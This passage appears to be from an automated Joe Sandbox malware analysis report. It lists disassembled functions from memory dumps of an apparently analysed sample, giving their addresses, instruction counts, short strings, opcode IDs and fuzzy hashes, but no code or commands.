                                                                                                                                                                                                  Function 00ED0B88 Relevance: 2.0, Strings: 1, Instructions: 797COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002D.00000002.2723966704.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_45_2_ed0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: dwq
                                                                                                                                                                                                  • API String ID: 0-1204298229
                                                                                                                                                                                                  • Opcode ID: 473fdcbfb37e7c4902ce9570d3fe3401a05d68e95eb2e1a2f7ec993e05dcec24
                                                                                                                                                                                                  • Instruction ID: f7e58398d0d74df0d812a91f31cc21d0556ff85c7cfae5e462c9bb248f254992
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 473fdcbfb37e7c4902ce9570d3fe3401a05d68e95eb2e1a2f7ec993e05dcec24
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F827074A002698FCB24DFA8D994BD9B7B1FF49304F1095AAD409BB365DB30AE85CF50
                                                                                                                                                                                                  Function 00ED0662 Relevance: 1.5, Strings: 1, Instructions: 298COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002D.00000002.2723966704.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_45_2_ed0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: LRsq
                                                                                                                                                                                                  • API String ID: 0-3165563352
                                                                                                                                                                                                  • Opcode ID: b4c3398eb08057e1243f0b13f7854cf7fbda2b3a7fa127126c0860525157849a
                                                                                                                                                                                                  • Instruction ID: 747b341ae5fa2ef0224d1edc5a7ae9f1ec3dff94913829c50e315e9d2579a8c5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4c3398eb08057e1243f0b13f7854cf7fbda2b3a7fa127126c0860525157849a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D41C3708053499FCB06EFA8E89479D7FB1FF46304F00599AD400EB2A6DB705E45DBA2
                                                                                                                                                                                                  Function 00ED069E Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002D.00000002.2723966704.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_45_2_ed0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: LRsq
                                                                                                                                                                                                  • API String ID: 0-3165563352
                                                                                                                                                                                                  • Opcode ID: 3931366e21b389ccdfa4ff95a73d127b8f293261df06f8235f4c805abf4955dc
                                                                                                                                                                                                  • Instruction ID: 556c50cce5c450a3d6865f443212cbc173eee67da1aecd7b3ddabb1e924bb6ea
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3931366e21b389ccdfa4ff95a73d127b8f293261df06f8235f4c805abf4955dc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 783192709057499FCB06FFA8E89078D7FB1FB46308F0059AAD004EB2A6DB705D49CBA1
                                                                                                                                                                                                  Function 00ED0640 Relevance: 1.5, Strings: 1, Instructions: 267COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002D.00000002.2723966704.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_45_2_ed0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: LRsq
                                                                                                                                                                                                  • API String ID: 0-3165563352
                                                                                                                                                                                                  • Opcode ID: bacf4b50ce7ce637d1d10c5b96049ad477a84c1e0c5b10918acc9e168a252a39
                                                                                                                                                                                                  • Instruction ID: 17cf736d11f4b58730e000c0ce3e0befd8ef1339ff3192b9e00779b8e53784c0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bacf4b50ce7ce637d1d10c5b96049ad477a84c1e0c5b10918acc9e168a252a39
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 573181709057499FCB06FFA8E89078D7FB1FB46304F0059AAD000EB2A6DB705D49CBA1
                                                                                                                                                                                                  Function 00ED0652 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002D.00000002.2723966704.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_45_2_ed0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: LRsq
                                                                                                                                                                                                  • API String ID: 0-3165563352
                                                                                                                                                                                                  • Opcode ID: 4bb547c7727c367a7442249f1b92dd05d8ed82184ab4b58ca2fe12fe3fdf6d28
                                                                                                                                                                                                  • Instruction ID: 434c54793de27d0cdb48d6c28a3653d1849a36d14f6cd28ad44a4879e96d018e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bb547c7727c367a7442249f1b92dd05d8ed82184ab4b58ca2fe12fe3fdf6d28
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5931A4709057499FCB06FFA8E89479D7FB1FB45304F0049AAD404EB2A6EB705E45CBA1
                                                                                                                                                                                                  Function 00ED0848 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002D.00000002.2723966704.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_45_2_ed0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: LRsq
                                                                                                                                                                                                  • API String ID: 0-3165563352
                                                                                                                                                                                                  • Opcode ID: 5fc95ace92da163e89a89bcb2968b6b4b8880a3f491b46f8a9af4f295f703457
                                                                                                                                                                                                  • Instruction ID: 047c0d376414b70ff53fad52d1d53371074f82507484fcdb7db49fe934d98a39
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5fc95ace92da163e89a89bcb2968b6b4b8880a3f491b46f8a9af4f295f703457
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6215CB09006099FCB05FFA8E894B9DBBB1FB45308F005968E405EB365EB705E85DFA1
                                                                                                                                                                                                  Function 00ED0A70 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002D.00000002.2723966704.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_45_2_ed0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 2da5a6908ed48b79823d6b3152d06ce2eb4104c9378350fb293c873102c7b210
                                                                                                                                                                                                  • Instruction ID: 47e3cb01f615b70eaf0276d9be1771e9259309cc6bc14a5bcc75c98fcb193011
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2da5a6908ed48b79823d6b3152d06ce2eb4104c9378350fb293c873102c7b210
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC212871D0424A9FCF01DFA9D4509DDBBB1EF49310F4582AAD451BB2A2DB70AD8ACF60
                                                                                                                                                                                                  Function 00ED1978 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002D.00000002.2723966704.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_45_2_ed0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 7e026be73b1122b13c77c93cf03100f8ea6f7b13ddb24fc1f69feefc521a4b74
                                                                                                                                                                                                  • Instruction ID: a2344eefe5d260b1196b45df7525e24e81133da6584b2cabe727aa79f5889f22
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e026be73b1122b13c77c93cf03100f8ea6f7b13ddb24fc1f69feefc521a4b74
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80014B74C092499ACF01CFA6D4247EDBBF0EB8A314F1460AAD454B6261D7794A0ADF64
                                                                                                                                                                                                  Function 00ED0A10 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002D.00000002.2723966704.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_45_2_ed0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 374b99e0b6339498284df43b9d2d5dbb6d864ff02f39eb8c3cce114e1af77e3c
                                                                                                                                                                                                  • Instruction ID: 179bad109063d4acc13544e294b2f2eb67a8950d7e08de5cb31c8689fba52963
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 374b99e0b6339498284df43b9d2d5dbb6d864ff02f39eb8c3cce114e1af77e3c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3F0FF70C00219DFCB44EFB8C851AEDBBB0FF09304F108AAAC415A73A0EB708A45CB81
                                                                                                                                                                                                  Function 00ED0A18 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002D.00000002.2723966704.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_45_2_ed0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: c70bb00c6d61c6c22a6ba0dfbfd865a1b6d4bbd1873b8c8f137a8affcc1d3b62
                                                                                                                                                                                                  • Instruction ID: ed0b39ab2d0edbb6f3b57a43b4f36bb4001a29db5032a33c16e64c29ac215355
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c70bb00c6d61c6c22a6ba0dfbfd865a1b6d4bbd1873b8c8f137a8affcc1d3b62
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7F0AF70C00219DFCB44EFA8D940AAEBBB4FF05304F1046AAD415A7350EB719A44CB90

                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                  Function 00007FF848F32E1C Relevance: 1.8, Strings: 1, Instructions: 594COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: rS_H
                                                                                                                                                                                                  • API String ID: 0-3417092059
                                                                                                                                                                                                  • Opcode ID: 135c595ca34c6b841b3280852e265503849b59965ed5b0d6b67372dc544aecc9
                                                                                                                                                                                                  • Instruction ID: 17eb513fa68e5dadc00b3640f57bfee1fb0d5d5dd611b302ffd403a4c8a15755
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 135c595ca34c6b841b3280852e265503849b59965ed5b0d6b67372dc544aecc9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD02D870A1DA8A5FEB95FB2C98546B63BE2FF9A340F0401BAD44DC71D6DE28AC41C750
                                                                                                                                                                                                  Function 00007FF848F331C7 Relevance: 1.0, Instructions: 974COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f35f58bb4a9c19daadf32ec8da93a1cd16429b269c571552e4b71cad17251c38
                                                                                                                                                                                                  • Instruction ID: 1f4e2982a52d35dfed61cc977e2a348690d1c2a532b37c9c7c56a2cce4b33463
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f35f58bb4a9c19daadf32ec8da93a1cd16429b269c571552e4b71cad17251c38
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76624E70A1C94A8FDB85EF2CD494AA937E2FF59344F1401BAE44ECB296DE25EC42C750
                                                                                                                                                                                                  Function 00007FF848F34141 Relevance: .7, Instructions: 667COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f52aa52732465817a65ce77c845855792959c5441924838aabd731841081cd8b
                                                                                                                                                                                                  • Instruction ID: 9d3109117d83b142543646bafdca08d84c552f64f63063c68c21bd8c8bf8654c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f52aa52732465817a65ce77c845855792959c5441924838aabd731841081cd8b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47325A71C096598FE799EF6484547F8B7B1EF6A380F5010BAD00DEB2D2DB395A84CB14
                                                                                                                                                                                                  Function 00007FF848F34F54 Relevance: .5, Instructions: 508COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 2fde17261c18a82f233716c8f970ba8e9b4919a08b6f6d450051abcc2042b414
                                                                                                                                                                                                  • Instruction ID: f4809b532ad30b499c64f37c4e9786b7f9b3d01479759e140f812b7d632476b1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fde17261c18a82f233716c8f970ba8e9b4919a08b6f6d450051abcc2042b414
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF12D870D19A1D8FDB99EB28C894BE8B7B2FF59340F5041EAD00DE7292DA356D84CB10
                                                                                                                                                                                                  Function 00007FF848F306D1 Relevance: 6.0, Strings: 4, Instructions: 970COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: M_^=$M_^>$M_^?$M_^@
                                                                                                                                                                                                  • API String ID: 0-1339898167
                                                                                                                                                                                                  • Opcode ID: 630051ad93e461f03d24fdd04e3d2d15c0bd90503f0bfcc9be4ceff52aee8f8b
                                                                                                                                                                                                  • Instruction ID: b09631805e09dd235b80054d55c8ca86675c6bd621079a77c38a4a215b201c1c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 630051ad93e461f03d24fdd04e3d2d15c0bd90503f0bfcc9be4ceff52aee8f8b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2972A57091965D8FE786EB28C450BE97BB2FF5A384F4141EAC00DDB292DE365E84CB50
                                                                                                                                                                                                  Function 00007FF848F307FA Relevance: .9, Instructions: 899COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 6ddff5ec05fb7653c98c760d3631322c7525d0f8f101c10abe313c85b2e95b8c
                                                                                                                                                                                                  • Instruction ID: 933be7691658df1e7a10d2c710a8b41be21317a1bbef1b079b44cb467eed65de
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ddff5ec05fb7653c98c760d3631322c7525d0f8f101c10abe313c85b2e95b8c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88626470919A5D8FE796EB28C454BA87BB2FF5A344F4140EAC00DDB392DE365E84CB50
                                                                                                                                                                                                  Function 00007FF848F358EA Relevance: .7, Instructions: 678COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: d8a30c43dacf39f5a9e534f1f1297c6614416ad1a6f108b5a0be931b97365e4d
                                                                                                                                                                                                  • Instruction ID: bcb291252e98afb53c26a1cb17c4e5de66d1dcb3d876c633a17e85874b69a83a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8a30c43dacf39f5a9e534f1f1297c6614416ad1a6f108b5a0be931b97365e4d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0B15970D096198FEB49EB68D8946FDB7B1FF59380F40007AD049EB2D2DB392944CB14
                                                                                                                                                                                                  Function 00007FF848F3590C Relevance: .4, Instructions: 384COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e8cbf75be9cc2d81f11130277806908e82e2616b6c55746cde69f43d5caa7447
                                                                                                                                                                                                  • Instruction ID: 2fa2627ed6377e8cbd18f0f05ba7b972a25a7a9606d5a9eaf78fd1e6a259fda5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8cbf75be9cc2d81f11130277806908e82e2616b6c55746cde69f43d5caa7447
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26715AB1D092199FEB49EB64D4943FDB7B1EF5A384F40007AD049AB2D2DF382948CB55
                                                                                                                                                                                                  Function 00007FF848F35964 Relevance: .4, Instructions: 379COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: dc8341531155913b416136fbe245c7f9a0a949d866d528bffe08c6886058c05a
                                                                                                                                                                                                  • Instruction ID: 02f4f1b0d219a86d48be3127bfa68f6402bfc2c9083d5f222f4b87631ad86b6e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc8341531155913b416136fbe245c7f9a0a949d866d528bffe08c6886058c05a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25616CB1D092199FEB49EB64D4947FDB7B1FF5A384F4000BAD049A72D2DB382948CB54
                                                                                                                                                                                                  Function 00007FF848F3591A Relevance: .4, Instructions: 377COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 4dde4a480057bb93b37258c5c120ca3255ee5568e61871fcd6b1484617319a47
                                                                                                                                                                                                  • Instruction ID: 19ec42c0a332f1c00b1a3a763cfe7242b16c512119b26d35ea8b605ad325e84d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4dde4a480057bb93b37258c5c120ca3255ee5568e61871fcd6b1484617319a47
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40615AB1D092198FEB49EB64D4947FDB7B1FF5A384F4000BAD049A72D2DB382988CB54
                                                                                                                                                                                                  Function 00007FF848F3591F Relevance: .4, Instructions: 376COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 5e2ad34f78e7560c36d2a599c4f2de6991d1de08b6fb9b0b602bf6e15ffce52e
                                                                                                                                                                                                  • Instruction ID: 9b83262e6e1dc0cfadbc1a07fdfbb0b8f41277f9bfc388504663b950be89e552
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e2ad34f78e7560c36d2a599c4f2de6991d1de08b6fb9b0b602bf6e15ffce52e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 296159B0D092199FEB49EB64D4947FDB7B1FF5A380F4000BAD049A72D2DB392988CB55
                                                                                                                                                                                                  Function 00007FF848F3447C Relevance: .2, Instructions: 248COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 1a20157f8b87c767c0317b260e586608873ca5692dad2cab7b346d6731ac8e03
                                                                                                                                                                                                  • Instruction ID: 64321c01958d7961fbd4864f2cb048592cf361c5506012521e58a5f38ecfddd5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a20157f8b87c767c0317b260e586608873ca5692dad2cab7b346d6731ac8e03
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1912871C096298FE799EF64C4947F8B6F1EF29385F5000BAD049EB2D2DB385A84CB14
                                                                                                                                                                                                  Function 00007FF848F31B7A Relevance: .2, Instructions: 179COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 471d04ccb0f3d948ec23d588a474c9533c1802e1e8cc75acde07b9b28ce94422
                                                                                                                                                                                                  • Instruction ID: f8fc53ed9c31959cb4c56a7f6ab3844c26d1ff818ce24937be9c9dc27ce2d3b7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 471d04ccb0f3d948ec23d588a474c9533c1802e1e8cc75acde07b9b28ce94422
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C517671D0964D8FEB98EF68C8557E9BBE1FF59380F1001AAE009E7282DB345985CB54
                                                                                                                                                                                                  Function 00007FF848F34C10 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 03e368cbd7af4b93bb5a66e3c53ead9ff435304de24fc3bb5b934bbba73f4c6e
                                                                                                                                                                                                  • Instruction ID: 4e99a47a027d2785e3b2f272fdc26eced056aa102758cc6c8601b9a9c2206dff
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 03e368cbd7af4b93bb5a66e3c53ead9ff435304de24fc3bb5b934bbba73f4c6e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F51A370D18A1D9FDB54EFA8D494AECBBF1FF29351F50116AD009E72A1DB389980CB44
                                                                                                                                                                                                  Function 00007FF848F342D6 Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
